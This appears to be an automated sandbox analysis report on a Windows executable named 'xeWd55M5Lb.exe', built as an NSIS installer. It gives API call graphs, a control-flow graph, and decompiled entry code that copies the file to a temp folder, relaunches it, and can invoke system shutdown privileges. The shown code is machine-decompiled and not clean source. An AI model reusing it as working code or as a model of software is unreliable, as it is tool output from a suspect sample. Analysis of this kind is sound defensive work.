4512->4516 4514 401c03 GlobalFree 4514->4509 4515 401bce 4521 406668 lstrcpynW 4515->4521 4516->4509 4518 401bdd 4523 406668 lstrcpynW 4518->4523 4520->4515 4521->4518 4522->4514 4523->4509 4524 40261c 4525 402da6 17 API calls 4524->4525 4526 402623 4525->4526 4529 406158 GetFileAttributesW CreateFileW 4526->4529 4528 40262f 4529->4528 4537 40149e 4538 4014ac PostQuitMessage 4537->4538 4539 40239d 4537->4539 4538->4539 4540 40259e 4550 402de6 4540->4550 4543 402d84 17 API calls 4544 4025b1 4543->4544 4545 4025d9 RegEnumValueW 4544->4545 4546 4025cd RegEnumKeyW 4544->4546 4548 40292e 4544->4548 4547 4025ee RegCloseKey 4545->4547 4546->4547 4547->4548 4551 402da6 17 API calls 4550->4551 4552 402dfd 4551->4552 4553 4064d5 RegOpenKeyExW 4552->4553 4554 4025a8 4553->4554 4554->4543 4555 4015a3 4556 402da6 17 API calls 4555->4556 4557 4015aa SetFileAttributesW 4556->4557 4558 4015bc 4557->4558 3754 401fa4 3755 402da6 17 API calls 3754->3755 3756 401faa 3755->3756 3757 4056ca 24 API calls 3756->3757 3758 401fb4 3757->3758 3759 405c4b 2 API calls 3758->3759 3760 401fba 3759->3760 3761 401fdd CloseHandle 3760->3761 3764 40292e 3760->3764 3769 406ae0 WaitForSingleObject 3760->3769 3761->3764 3765 401fcf 3766 401fd4 3765->3766 3767 401fdf 3765->3767 3774 4065af wsprintfW 3766->3774 3767->3761 3770 406afa 3769->3770 3771 406b0c GetExitCodeProcess 3770->3771 3772 406a71 2 API calls 3770->3772 3771->3765 3773 406b01 WaitForSingleObject 3772->3773 3773->3770 3774->3761 3874 403c25 3875 403c40 3874->3875 3876 403c36 CloseHandle 3874->3876 3877 403c54 3875->3877 3878 403c4a CloseHandle 3875->3878 3876->3875 3883 403c82 3877->3883 3878->3877 3881 405d74 67 API calls 3882 403c65 3881->3882 3884 403c90 3883->3884 3885 403c59 3884->3885 3886 403c95 FreeLibrary GlobalFree 3884->3886 3885->3881 3886->3885 3886->3886 4559 40202a 4560 402da6 17 API calls 4559->4560 4561 402031 4560->4561 4562 406a35 5 API calls 4561->4562 4563 402040 4562->4563 4564 4020cc 4563->4564 4565 40205c GlobalAlloc 4563->4565 4565->4564 4566 402070 4565->4566 4567 406a35 5 API calls 4566->4567 4568 402077 4567->4568 4569 406a35 5 API calls 4568->4569 4570 402081 4569->4570 4570->4564 4574 4065af wsprintfW 4570->4574 4572 4020ba 4575 4065af wsprintfW 4572->4575 4574->4572 4575->4564 4576 40252a 4577 402de6 17 API calls 4576->4577 4578 402534 4577->4578 4579 402da6 17 API calls 4578->4579 4580 40253d 4579->4580 4581 402548 RegQueryValueExW 4580->4581 4585 40292e 4580->4585 4582 40256e RegCloseKey 4581->4582 4583 402568 4581->4583 4582->4585 4583->4582 4587 4065af wsprintfW 4583->4587 4587->4582 4588 4021aa 4589 402da6 17 API calls 4588->4589 4590 4021b1 4589->4590 4591 402da6 17 API calls 4590->4591 4592 4021bb 4591->4592 4593 402da6 17 API calls 4592->4593 4594 4021c5 4593->4594 4595 402da6 17 API calls 4594->4595 4596 4021cf 4595->4596 4597 402da6 17 API calls 4596->4597 4598 4021d9 4597->4598 4599 402218 CoCreateInstance 4598->4599 4600 402da6 17 API calls 4598->4600 4603 402237 4599->4603 4600->4599 4601 401423 24 API calls 4602 4022f6 4601->4602 4603->4601 4603->4602 4611 401a30 4612 402da6 17 API calls 4611->4612 4613 401a39 ExpandEnvironmentStringsW 4612->4613 4614 401a60 4613->4614 4615 401a4d 4613->4615 4615->4614 4616 401a52 lstrcmpW 4615->4616 4616->4614 4617 405031 GetDlgItem GetDlgItem 4618 405083 7 API calls 4617->4618 4619 4052a8 4617->4619 4620 40512a DeleteObject 4618->4620 4621 40511d SendMessageW 4618->4621 4641 40538a 4619->4641 4651 405317 4619->4651 4671 404f7f SendMessageW 4619->4671 4622 405133 4620->4622 4621->4620 4623 40516a 4622->4623 4626 4066a5 17 API calls 4622->4626 4624 4045c4 18 API calls 4623->4624 4627 40517e 4624->4627 4625 405436 4629 405440 SendMessageW 4625->4629 4630 405448 4625->4630 4631 40514c SendMessageW SendMessageW 4626->4631 4633 4045c4 18 API calls 4627->4633 4628 40529b 4636 40462b 8 API calls 4628->4636 4629->4630 4637 405461 4630->4637 4638 40545a ImageList_Destroy 4630->4638 4646 405471 4630->4646 4631->4622 4652 40518f 4633->4652 4634 4053e3 SendMessageW 4634->4628 4640 4053f8 SendMessageW 4634->4640 4635 40537c SendMessageW 4635->4641 4642 405637 4636->4642 4643 40546a GlobalFree 4637->4643 4637->4646 4638->4637 4639 4055eb 4639->4628 4647 4055fd ShowWindow GetDlgItem ShowWindow 4639->4647 4645 40540b 4640->4645 4641->4625 4641->4628 4641->4634 4643->4646 4644 40526a GetWindowLongW SetWindowLongW 4648 405283 4644->4648 4656 40541c SendMessageW 4645->4656 4646->4639 4664 4054ac 4646->4664 4676 404fff 4646->4676 4647->4628 4649 4052a0 4648->4649 4650 405288 ShowWindow 4648->4650 4670 4045f9 SendMessageW 4649->4670 4669 4045f9 SendMessageW 4650->4669 4651->4635 4651->4641 4652->4644 4655 4051e2 SendMessageW 4652->4655 4657 405265 4652->4657 4658 405220 SendMessageW 4652->4658 4659 405234 SendMessageW 4652->4659 4655->4652 4656->4625 4657->4644 4657->4648 4658->4652 4659->4652 4661 4055b6 4662 4055c1 InvalidateRect 4661->4662 4665 4055cd 4661->4665 4662->4665 4663 4054da SendMessageW 4666 4054f0 4663->4666 4664->4663 4664->4666 4665->4639 4685 404f3a 4665->4685 4666->4661 4667 405564 SendMessageW SendMessageW 4666->4667 4667->4666 4669->4628 4670->4619 4672 404fa2 GetMessagePos ScreenToClient SendMessageW 4671->4672 4673 404fde SendMessageW 4671->4673 4674 404fd6 4672->4674 4675 404fdb 4672->4675 4673->4674 4674->4651 4675->4673 4688 406668 lstrcpynW 4676->4688 4678 405012 4689 4065af wsprintfW 4678->4689 4680 40501c 4681 40140b 2 API calls 4680->4681 4682 405025 4681->4682 4690 406668 lstrcpynW 4682->4690 4684 40502c 4684->4664 4691 404e71 4685->4691 4687 404f4f 4687->4639 4688->4678 4689->4680 4690->4684 4692 404e8a 4691->4692 4693 4066a5 17 API calls 4692->4693 4694 404eee 4693->4694 4695 4066a5 17 API calls 4694->4695 4696 404ef9 4695->4696 4697 4066a5 17 API calls 4696->4697 4698 404f0f lstrlenW wsprintfW SetDlgItemTextW 4697->4698 4698->4687 4704 4023b2 4705 4023ba 4704->4705 4708 4023c0 4704->4708 4706 402da6 17 API calls 4705->4706 4706->4708 4707 4023ce 4710 4023dc 4707->4710 4712 402da6 17 API calls 4707->4712 4708->4707 4709 402da6 17 API calls 4708->4709 4709->4707 4711 402da6 17 API calls 4710->4711 4713 4023e5 WritePrivateProfileStringW 4711->4713 4712->4710 4714 404734 lstrlenW 4715 404753 4714->4715 4716 404755 WideCharToMultiByte 4714->4716 4715->4716 4717 402434 4718 402467 4717->4718 4719 40243c 4717->4719 4721 402da6 17 API calls 4718->4721 4720 402de6 17 API calls 4719->4720 4722 402443 4720->4722 4723 40246e 4721->4723 4725 402da6 17 API calls 4722->4725 4727 40247b 4722->4727 4728 402e64 4723->4728 4726 402454 RegDeleteValueW RegCloseKey 4725->4726 4726->4727 4729 402e78 4728->4729 4731 402e71 4728->4731 4729->4731 4732 402ea9 4729->4732 4731->4727 4733 4064d5 RegOpenKeyExW 4732->4733 4734 402ed7 4733->4734 4735 402ee7 RegEnumValueW 4734->4735 4742 402f81 4734->4742 4744 402f0a 4734->4744 4736 402f71 RegCloseKey 4735->4736 4735->4744 4736->4742 4737 402f46 RegEnumKeyW 4738 402f4f RegCloseKey 4737->4738 4737->4744 4739 406a35 5 API calls 4738->4739 4740 402f5f 4739->4740 4740->4742 4743 402f63 RegDeleteKeyW 4740->4743 4741 402ea9 6 API calls 4741->4744 4742->4731 4743->4742 4744->4736 4744->4737 4744->4738 4744->4741 4745 401735 4746 402da6 17 API calls 4745->4746 4747 40173c SearchPathW 4746->4747 4748 401757 4747->4748 4749 404ab5 4750 404ae1 4749->4750 4751 404af2 4749->4751 4810 405cac GetDlgItemTextW 4750->4810 4753 404afe GetDlgItem 4751->4753 4758 404b5d 4751->4758 4755 404b12 4753->4755 4754 404aec 4757 4068ef 5 API calls 4754->4757 4761 404b26 SetWindowTextW 4755->4761 4766 405fe2 4 API calls 4755->4766 4756 404c41 4759 404df0 4756->4759 4812 405cac GetDlgItemTextW 4756->4812 4757->4751 4758->4756 4758->4759 4763 4066a5 17 API calls 4758->4763 4765 40462b 8 API calls 4759->4765 4764 4045c4 18 API calls 4761->4764 4762 404c71 4767 40603f 18 API calls 4762->4767 4768 404bd1 SHBrowseForFolderW 4763->4768 4769 404b42 4764->4769 4770 404e04 4765->4770 4771 404b1c 4766->4771 4772 404c77 4767->4772 4768->4756 4773 404be9 CoTaskMemFree 4768->4773 4774 4045c4 18 API calls 4769->4774 4771->4761 4775 405f37 3 API calls 4771->4775 4813 406668 lstrcpynW 4772->4813 4776 405f37 3 API calls 4773->4776 4777 404b50 4774->4777 4775->4761 4778 404bf6 4776->4778 4811 4045f9 SendMessageW 4777->4811 4781 404c2d SetDlgItemTextW 4778->4781 4786 4066a5 17 API calls 4778->4786 4781->4756 4782 404b56 4784 406a35 5 API calls 4782->4784 4783 404c8e 4785 406a35 5 API calls 4783->4785 4784->4758 4793 404c95 4785->4793 4787 404c15 lstrcmpiW 4786->4787 4787->4781 4790 404c26 lstrcatW 4787->4790 4788 404cd6 4814 406668 lstrcpynW 4788->4814 4790->4781 4791 404cdd 4792 405fe2 4 API calls 4791->4792 4794 404ce3 GetDiskFreeSpaceW 4792->4794 4793->4788 4796 405f83 2 API calls 4793->4796 4798 404d2e 4793->4798 4797 404d07 MulDiv 4794->4797 4794->4798 4796->4793 4797->4798 4799 404f3a 20 API calls 4798->4799 4807 404d9f 4798->4807 4802 404d8c 4799->4802 4800 404dc2 4815 4045e6 EnableWindow 4800->4815 4801 40140b 2 API calls 4801->4800 4804 404da1 SetDlgItemTextW 4802->4804 4805 404d91 4802->4805 4804->4807 4806 404e71 20 API calls 4805->4806 4806->4807 4807->4800 4807->4801 4808 404dde 4808->4759 4809 404a0e SendMessageW 4808->4809 4809->4759 4810->4754 4811->4782 4812->4762 4813->4783 4814->4791 4815->4808 4816 401d38 4817 402d84 17 API calls 4816->4817 4818 401d3f 4817->4818 4819 402d84 17 API calls 4818->4819 4820 401d4b GetDlgItem 4819->4820 4821 402638 4820->4821 4822 4014b8 4823 4014be 4822->4823 4824 401389 2 API calls 4823->4824 4825 4014c6 4824->4825 4826 40563e 4827 405662 4826->4827 4828 40564e 4826->4828 4831 40566a IsWindowVisible 4827->4831 4837 405681 4827->4837 4829 405654 4828->4829 4830 4056ab 4828->4830 4833 404610 SendMessageW 4829->4833 4832 4056b0 CallWindowProcW 4830->4832 4831->4830 4834 405677 4831->4834 4835 40565e 4832->4835 4833->4835 4836 404f7f 5 API calls 4834->4836 4836->4837 4837->4832 4838 404fff 4 API calls 4837->4838 4838->4830 4839 40263e 4840 402652 4839->4840 4841 40266d 4839->4841 4842 402d84 17 API calls 4840->4842 4843 402672 4841->4843 4844 40269d 4841->4844 4853 402659 4842->4853 4846 402da6 17 API calls 4843->4846 4845 402da6 17 API calls 4844->4845 4847 4026a4 lstrlenW 4845->4847 4848 402679 4846->4848 4847->4853 4856 40668a WideCharToMultiByte 4848->4856 4850 40268d lstrlenA 4850->4853 4851 4026e7 4852 4026d1 4852->4851 4854 40620a WriteFile 4852->4854 4853->4851 4853->4852 4855 406239 5 API calls 4853->4855 4854->4851 4855->4852 4856->4850

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                          C-Code - Quality: 78%
                                                          			_entry_() {
                                                          				WCHAR* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				signed int _v20;
                                                          				int _v24;
                                                          				int _v28;
                                                          				struct _TOKEN_PRIVILEGES _v40;
                                                          				signed char _v42;
                                                          				int _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v278;
                                                          				signed short _v310;
                                                          				struct _OSVERSIONINFOW _v324;
                                                          				struct _SHFILEINFOW _v1016;
                                                          				intOrPtr* _t88;
                                                          				WCHAR* _t92;
                                                          				char* _t94;
                                                          				void _t97;
                                                          				void* _t116;
                                                          				WCHAR* _t118;
                                                          				signed int _t119;
                                                          				intOrPtr* _t123;
                                                          				void* _t137;
                                                          				void* _t143;
                                                          				void* _t148;
                                                          				void* _t152;
                                                          				void* _t157;
                                                          				signed int _t167;
                                                          				void* _t170;
                                                          				void* _t175;
                                                          				intOrPtr _t177;
                                                          				intOrPtr _t178;
                                                          				intOrPtr* _t179;
                                                          				int _t188;
                                                          				void* _t189;
                                                          				void* _t198;
                                                          				signed int _t204;
                                                          				signed int _t209;
                                                          				signed int _t214;
                                                          				signed int _t216;
                                                          				int* _t218;
                                                          				signed int _t226;
                                                          				signed int _t229;
                                                          				CHAR* _t231;
                                                          				char* _t232;
                                                          				signed int _t233;
                                                          				WCHAR* _t234;
                                                          				void* _t250;
                                                          
                                                          				_t216 = 0x20;
                                                          				_t188 = 0;
                                                          				_v24 = 0;
                                                          				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                          				_v20 = 0;
                                                          				SetErrorMode(0x8001); // executed
                                                          				_v324.szCSDVersion = 0;
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v324.dwOSVersionInfoSize = 0x11c;
                                                          				if(GetVersionExW( &_v324) == 0) {
                                                          					_v324.dwOSVersionInfoSize = 0x114;
                                                          					GetVersionExW( &_v324);
                                                          					asm("sbb eax, eax");
                                                          					_v42 = 4;
                                                          					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                          				}
                                                          				if(_v324.dwMajorVersion < 0xa) {
                                                          					_v310 = _v310 & 0x00000000;
                                                          				}
                                                          				 *0x42a318 = _v324.dwBuildNumber;
                                                          				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                          				if( *0x42a31e != 0x600) {
                                                          					_t179 = E00406A35(_t188);
                                                          					if(_t179 != _t188) {
                                                          						 *_t179(0xc00);
                                                          					}
                                                          				}
                                                          				_t231 = "UXTHEME";
                                                          				do {
                                                          					E004069C5(_t231); // executed
                                                          					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                          				} while ( *_t231 != 0);
                                                          				E00406A35(0xb);
                                                          				 *0x42a264 = E00406A35(9);
                                                          				_t88 = E00406A35(7);
                                                          				if(_t88 != _t188) {
                                                          					_t88 =  *_t88(0x1e);
                                                          					if(_t88 != 0) {
                                                          						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                          					}
                                                          				}
                                                          				__imp__#17();
                                                          				__imp__OleInitialize(_t188); // executed
                                                          				 *0x42a320 = _t88;
                                                          				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                          				E00406668(0x429260, L"NSIS Error");
                                                          				_t92 = GetCommandLineW();
                                                          				_t232 = L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ";
                                                          				E00406668(_t232, _t92);
                                                          				_t94 = _t232;
                                                          				_t233 = 0x22;
                                                          				 *0x42a260 = 0x400000;
                                                          				_t250 = L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" " - _t233; // 0x22
                                                          				if(_t250 == 0) {
                                                          					_t216 = _t233;
                                                          					_t94 =  &M00435002;
                                                          				}
                                                          				_t198 = CharNextW(E00405F64(_t94, _t216));
                                                          				_v16 = _t198;
                                                          				while(1) {
                                                          					_t97 =  *_t198;
                                                          					_t251 = _t97 - _t188;
                                                          					if(_t97 == _t188) {
                                                          						break;
                                                          					}
                                                          					_t209 = 0x20;
                                                          					__eflags = _t97 - _t209;
                                                          					if(_t97 != _t209) {
                                                          						L17:
                                                          						__eflags =  *_t198 - _t233;
                                                          						_v12 = _t209;
                                                          						if( *_t198 == _t233) {
                                                          							_v12 = _t233;
                                                          							_t198 = _t198 + 2;
                                                          							__eflags = _t198;
                                                          						}
                                                          						__eflags =  *_t198 - 0x2f;
                                                          						if( *_t198 != 0x2f) {
                                                          							L32:
                                                          							_t198 = E00405F64(_t198, _v12);
                                                          							__eflags =  *_t198 - _t233;
                                                          							if(__eflags == 0) {
                                                          								_t198 = _t198 + 2;
                                                          								__eflags = _t198;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          							_t198 = _t198 + 2;
                                                          							__eflags =  *_t198 - 0x53;
                                                          							if( *_t198 != 0x53) {
                                                          								L24:
                                                          								asm("cdq");
                                                          								asm("cdq");
                                                          								_t214 = L"NCRC" & 0x0000ffff;
                                                          								asm("cdq");
                                                          								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                          								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                          								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                          									L29:
                                                          									asm("cdq");
                                                          									asm("cdq");
                                                          									_t209 = L" /D=" & 0x0000ffff;
                                                          									asm("cdq");
                                                          									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                          									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                          									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                          										L31:
                                                          										_t233 = 0x22;
                                                          										goto L32;
                                                          									}
                                                          									__eflags =  *_t198 - _t229;
                                                          									if( *_t198 == _t229) {
                                                          										 *(_t198 - 4) = _t188;
                                                          										__eflags = _t198;
                                                          										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
                                                          										L37:
                                                          										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                          										GetTempPathW(0x400, _t234);
                                                          										_t116 = E0040360F(_t198, _t251);
                                                          										_t252 = _t116;
                                                          										if(_t116 != 0) {
                                                          											L40:
                                                          											DeleteFileW(L"1033"); // executed
                                                          											_t118 = E004030D0(_t254, _v20); // executed
                                                          											_v8 = _t118;
                                                          											if(_t118 != _t188) {
                                                          												L68:
                                                          												ExitProcess(); // executed
                                                          												__imp__OleUninitialize(); // executed
                                                          												if(_v8 == _t188) {
                                                          													if( *0x42a2f4 == _t188) {
                                                          														L77:
                                                          														_t119 =  *0x42a30c;
                                                          														if(_t119 != 0xffffffff) {
                                                          															_v24 = _t119;
                                                          														}
                                                          														ExitProcess(_v24);
                                                          													}
                                                          													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                          														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                          														_v40.PrivilegeCount = 1;
                                                          														_v28 = 2;
                                                          														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                          													}
                                                          													_t123 = E00406A35(4);
                                                          													if(_t123 == _t188) {
                                                          														L75:
                                                          														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                          															goto L77;
                                                          														}
                                                          														goto L76;
                                                          													} else {
                                                          														_push(0x80040002);
                                                          														_push(0x25);
                                                          														_push(_t188);
                                                          														_push(_t188);
                                                          														_push(_t188);
                                                          														if( *_t123() == 0) {
                                                          															L76:
                                                          															E0040140B(9);
                                                          															goto L77;
                                                          														}
                                                          														goto L75;
                                                          													}
                                                          												}
                                                          												E00405CC8(_v8, 0x200010);
                                                          												ExitProcess(2);
                                                          											}
                                                          											if( *0x42a27c == _t188) {
                                                          												L51:
                                                          												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                          												_v24 = E00403D17(_t264);
                                                          												goto L68;
                                                          											}
                                                          											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ", _t188);
                                                          											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ") {
                                                          												L48:
                                                          												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ";
                                                          												_v8 = L"Error launching installer";
                                                          												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ") {
                                                          													_t189 = E00405C33(__eflags);
                                                          													lstrcatW(_t234, L"~nsu");
                                                          													__eflags = _t189;
                                                          													if(_t189 != 0) {
                                                          														lstrcatW(_t234, "A");
                                                          													}
                                                          													lstrcatW(_t234, L".tmp");
                                                          													_t137 = lstrcmpiW(_t234, 0x436800);
                                                          													__eflags = _t137;
                                                          													if(_t137 == 0) {
                                                          														L67:
                                                          														_t188 = 0;
                                                          														__eflags = 0;
                                                          														goto L68;
                                                          													} else {
                                                          														__eflags = _t189;
                                                          														_push(_t234);
                                                          														if(_t189 == 0) {
                                                          															E00405C16();
                                                          														} else {
                                                          															E00405B99();
                                                          														}
                                                          														SetCurrentDirectoryW(_t234);
                                                          														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                          														if(__eflags == 0) {
                                                          															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", 0x436800);
                                                          														}
                                                          														E00406668(0x42b000, _v16);
                                                          														_t201 = "A" & 0x0000ffff;
                                                          														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                          														__eflags = _t143;
                                                          														_v12 = 0x1a;
                                                          														 *0x42b800 = _t143;
                                                          														do {
                                                          															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                          															DeleteFileW(0x420f08);
                                                          															__eflags = _v8;
                                                          															if(_v8 != 0) {
                                                          																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe", 0x420f08, 1);
                                                          																__eflags = _t148;
                                                          																if(_t148 != 0) {
                                                          																	E00406428(_t201, 0x420f08, 0);
                                                          																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                          																	_t152 = E00405C4B(0x420f08);
                                                          																	__eflags = _t152;
                                                          																	if(_t152 != 0) {
                                                          																		CloseHandle(_t152);
                                                          																		_v8 = 0;
                                                          																	}
                                                          																}
                                                          															}
                                                          															 *0x42b800 =  *0x42b800 + 1;
                                                          															_t61 =  &_v12;
                                                          															 *_t61 = _v12 - 1;
                                                          															__eflags =  *_t61;
                                                          														} while ( *_t61 != 0);
                                                          														E00406428(_t201, _t234, 0);
                                                          														goto L67;
                                                          													}
                                                          												}
                                                          												 *_t218 = _t188;
                                                          												_t221 =  &(_t218[2]);
                                                          												_t157 = E0040603F(_t263,  &(_t218[2]));
                                                          												_t264 = _t157;
                                                          												if(_t157 == 0) {
                                                          													goto L68;
                                                          												}
                                                          												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
                                                          												E00406668(0x436000, _t221);
                                                          												_v8 = _t188;
                                                          												goto L51;
                                                          											}
                                                          											asm("cdq");
                                                          											asm("cdq");
                                                          											asm("cdq");
                                                          											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                          											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                          											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                          												_t218 = _t218;
                                                          												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ") {
                                                          													continue;
                                                          												}
                                                          												break;
                                                          											}
                                                          											_t188 = 0;
                                                          											goto L48;
                                                          										}
                                                          										GetWindowsDirectoryW(_t234, 0x3fb);
                                                          										lstrcatW(_t234, L"\\Temp");
                                                          										_t170 = E0040360F(_t198, _t252);
                                                          										_t253 = _t170;
                                                          										if(_t170 != 0) {
                                                          											goto L40;
                                                          										}
                                                          										GetTempPathW(0x3fc, _t234);
                                                          										lstrcatW(_t234, L"Low");
                                                          										SetEnvironmentVariableW(L"TEMP", _t234);
                                                          										SetEnvironmentVariableW(L"TMP", _t234);
                                                          										_t175 = E0040360F(_t198, _t253);
                                                          										_t254 = _t175;
                                                          										if(_t175 == 0) {
                                                          											goto L68;
                                                          										}
                                                          										goto L40;
                                                          									}
                                                          									goto L31;
                                                          								}
                                                          								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                          								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                          									goto L29;
                                                          								}
                                                          								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                          								__eflags = _t177 - 0x20;
                                                          								if(_t177 == 0x20) {
                                                          									L28:
                                                          									_t36 =  &_v20;
                                                          									 *_t36 = _v20 | 0x00000004;
                                                          									__eflags =  *_t36;
                                                          									goto L29;
                                                          								}
                                                          								__eflags = _t177 - _t188;
                                                          								if(_t177 != _t188) {
                                                          									goto L29;
                                                          								}
                                                          								goto L28;
                                                          							}
                                                          							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                          							__eflags = _t178 - _t209;
                                                          							if(_t178 == _t209) {
                                                          								L23:
                                                          								 *0x42a300 = 1;
                                                          								goto L24;
                                                          							}
                                                          							__eflags = _t178 - _t188;
                                                          							if(_t178 != _t188) {
                                                          								goto L24;
                                                          							}
                                                          							goto L23;
                                                          						}
                                                          					} else {
                                                          						goto L16;
                                                          					}
                                                          					do {
                                                          						L16:
                                                          						_t198 = _t198 + 2;
                                                          						__eflags =  *_t198 - _t209;
                                                          					} while ( *_t198 == _t209);
                                                          					goto L17;
                                                          				}
                                                          				goto L37;
                                                          			}



















































                                                          0x0040364e
                                                          0x0040364f
                                                          0x00403656
                                                          0x00403659
                                                          0x00403660
                                                          0x00403663
                                                          0x00403676
                                                          0x0040367c
                                                          0x0040367f
                                                          0x00403682
                                                          0x00403690
                                                          0x00403698
                                                          0x004036a3
